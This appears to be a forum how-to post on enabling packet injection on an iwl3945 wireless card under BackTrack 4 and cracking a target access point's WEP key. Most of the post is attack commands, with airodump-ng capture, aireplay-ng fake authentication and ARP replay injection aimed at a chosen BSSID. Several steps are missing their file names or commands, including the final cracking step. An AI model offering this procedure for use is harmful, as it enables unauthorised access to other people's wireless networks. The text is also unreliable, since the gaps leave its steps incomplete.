HOW TO: iwl3945 BackTrack 4
Right, I spent ages trying to get this to work, following various tutorials, and I eventually managed to get it working... Very well in fact, 64-bit WEP in <2 mins.
The most important part ends after "ifconfig wifi0 up", because at that point your iwl3945 is ready to inject. After that it's a fake auth WEP attack, but it should work nonetheless.
1. Type iwconfig; it should show you eth0, eth1 and wlan0.
2. Run airodump-ng wlan0 and note down the BSSID (MAC) and channel of the AP you want to attack, then press Ctrl+C to quit it.
3. Configure your card to use ipwraw:
tar -xjf ipwraw-ng-2.3.4-04022008.tar.bz2
modprobe -r iwl3945
ifconfig wifi0 down
We need to edit a few files. I find nano to be the easiest editor; Ctrl+O saves a file and Ctrl+X exits.
Change the below file to the AP BSSID
Change the below file to the AP's Channel
Change the value from 108 to 2
ifconfig wifi0 up
Right, that's your card set for injection! It actually works!
To crack a WEP key using the fake auth method:
airodump-ng -w output.cap rtap0
Leave it running and, in a new window...
aireplay-ng -1 0 -a APMAChere wifi0
It should try to associate with the access point; you are looking for association successful. In a new window...
aireplay-ng -3 -b APMAChere wifi0
It should start injecting the AP; you are looking for the ARP count to rise!
In a new window...
Select your network from the list... you are looking for key found! You might need to try again as the IV count goes up (hopefully quickly).
This is how I made it work; if anyone knows a quicker/easier way then go for it, none that I found worked for me. This is a mix of a few!
Hope this saves someone some time or encourages them to give it another go.